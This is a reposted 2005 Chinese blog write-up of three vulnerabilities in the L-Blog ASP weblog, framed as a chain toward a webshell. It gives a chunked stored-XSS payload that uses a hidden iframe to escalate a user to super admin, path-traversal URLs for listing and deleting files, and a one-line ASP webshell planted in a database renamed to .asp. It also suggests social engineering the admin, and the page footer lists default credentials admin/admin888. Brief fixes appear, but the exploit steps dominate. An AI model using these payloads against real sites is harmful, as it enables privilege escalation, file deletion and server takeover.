L-Blog的三个漏洞

Authorlake2 http://lake2.0x54.org

Date 2005-12-29

 

L-Blog是由 Loveyuki 自主开发的基于 ASP+Access 的小型单用户BLOG,好像网上用的比较多,主要是免费的(呵呵,向Loveyuki致敬)。昨天寝室断网了,闲着没事干,就把以前下载的L-Blog V1.08 (SE) Final版本拿来看,结果还真发现了几个问题。

 

1L-Blog Cross-Site Scripting Vulnerability

这是个跨站漏洞,好像HaK_BaN很早就发现并通知了官方,所以问题已经修复。但是我下的那个版本却存在,所以还是要写出来J

问题存在于申请友情链接那里,对提交的网站名称没有进行HTML编码就直接写入数据库,管理员浏览读出的时候也没有进行编码,造成跨站脚本漏洞。

怎么利用呢,盗管理员Cookies?太麻烦,其实可以直接用javascript把页面转向到提升一般用户为超级管理员的链接。

呵呵,那就注册个帐号先,然后记住帐号的id,然后构造语句咯。

先看看把一般用户提升成超级管理员的链接,http://localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin,嗯我们可以提交<script>location.href=” admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin”</script>达到转向的目的。参数memID就是你要提升权限的用户id,这里我的id2

且慢,这里有两个问题,第一是数据库Blog_links表里的Link_Name字段最多放50个字符;第二是如果转向管理员会发现不对劲哦。所以要用拆分字符分次提交,而且使用框架让管理员看不到。

算了一下,至少要分四次提交,看exploit

<script>a="<iframe src=admincp.asp?actio"</script>

<script>a+="n=member&type=editmem&memID="</script>

<script>a+="2&memType=SupAdmin width="</script>

<script>a+="0 height=0>";document.write(a);</script>

呵呵,然后就等着管理员去看链接验证咯。要是等不及了可以想办法让他去看,看你的社会工程学水平了。

漏洞修补问题,最简单就是去官方下补丁。

 

2L-Blog File List / Delete with SuperAdmin Vulnerability

通过前面的漏洞我们可以成为blog管理员,现在我们得想办法拿webshell啊。呵呵,这个时候用这个漏洞最好不过了。好像还没人公布的说。

在附件管理选浏览all_files里的文件,看它的URLhttp://localhost/L-Blog/admincp.asp?action=attachment&foldername=All_Files,嘿嘿问题就出在参数foldername,没有过滤./,那就可以跨目录的哦。用这个url看看http://localhost/L-Blog/admincp.asp?action=attachment&foldername=..,呵呵,怎么样,blog根目录文件出来了,可以随便删除文件的哦。

利用这个漏洞我们可以任意查看网站各目录的文件,不过你要猜到文件夹才能浏览,L-Blog的数据库放在blogdata下,看看咯:http://localhost/L-Blog/admincp.asp?action=attachment&foldername=../blogdata

如果它的数据库是mdb,那就下载之,如果改成了asp/asa,那就请你看第三个漏洞哈。

这个漏洞的修复就是修改文件admincp.asp,只要把变量Request.QueryString("filename")里的“.”过滤就行了。

 

3L-Blog .asp/.asa DataBase Execute ASP Code Vulnerability

L-Blog的默认数据库名字是L-Blog.mdb,但是很多站长应该会改名称和后缀,一般改为asp或者asa,呵呵,如果改了,那站就完咯。

L-Blog.mdb里面有一个貌似防下载的表aNotDownload,其实一点用都没有,就算你改了后缀照样可下载。当然不去下载它,我是要拿webshell

现在就要向数据库写小马咯。

随便找个没有过滤html编码的地方,就找修改一般设置,Blog名称,填<%execute(request("x"))%>,然后再访问数据库,看看是不是有类型不匹配错误,ok,搞定!

漏洞的修复也简单,随便找个动网的数据库,找到notdown表导出到L-Blog的数据库中,呵呵,然后你再访问数据库试试。世界清静了……

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
欢迎使用L-Blog V1.08(SE) Final兄弟修改版,鉴于原版本经常受广告评论和垃圾引用的困扰,兄弟对程序进行了以下优化: 2010-1-4 1 修改了标签页面与SQL防注页面冲突的问题,同时修复了标签页面的提权漏洞 2 修改了首页的显示模式,采用默认展开式显示和列表式显示两种方式 3 增加了最新日志和最热日志调用模块,在需要的地方直接用call NewBlogList和call hotBlogList即可,跟首页里的Call NewCommList的使用方式一样. 2010-1-3 1 增加了留言本的功能,修改了和增加了相关的页面! 2 修改了跨站攻击的漏洞,后台管理页面,留言管理页面,日志评论页面,评论列表页面等指定用户访问,请不要修改管理账号admin,否则大部分页面都必须修改! 3 为防止跨站攻击,博客锁定为单用户使用和管理,只有管理员可以发表博文以及删除相关评论等.即使他人通过提权的方式把账号升级到管理员的身份,也一样无法发表,修改,删除相关的内容,也无法进入后台进行管理! 4 加入最近的SQL防注入程序,可以同时防止GET,POST,COOKIES的注入! 2010-1-2 1:修改验证码的显示方式,采用手工点击显示的方式,有效防止广告评论,主要修改了注册页面register.asp和评论发表页面blogview.asp 2:增加了关键字过滤以及IP过滤的功能,更新了数据库Blog_info表的结构,更新了commond.asp,Function.asp,blogcomm.asp,admincp.asp 等页面,登陆后台可以直接设置限制的IP和过滤的关键字. 3:增加了TAGS(标签)功能,数据库中增加了blog_tag和blog_tags两个表,更新了Function.asp,blogpost.asp,blogedit.asp,default.asp等相关页面,增加了blogtag.asp和tags.asp,并优化了版面. 4:更新了blogview.asp,blogvisit.asp的IP查询功能,直接调用http://www.030904.com/ip/index.asp的纯真IP数据库,删除了ipview.asp页面. 5:独立了数据库结构,把访问统计的数据单独放到一个数据库,避免数据过多的时候导致博客访问速度慢的问题,如果你的博客按每日1万条记录增加的话,每月的数据库将达到30M,不出半年,你的博客就慢如牛车. 6:虽然独立了数据库,后台管理也同时更新,后台可以直接删除访问记录,可以压缩和备份数据库. 7:处理了一些页面可能出现乱码的情况,关闭了引用页面,防止垃圾引用,如果要开启,请删除trackback.asp的以下内容:   8:修改了search.asp页面版面无法对齐的问题. 9:增加了数据库防下载功能 10:后面管理账户是admin,密码是admin888 如有其它问题,欢迎光临我的博客:http://www.030904.com/blog/default.asp

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值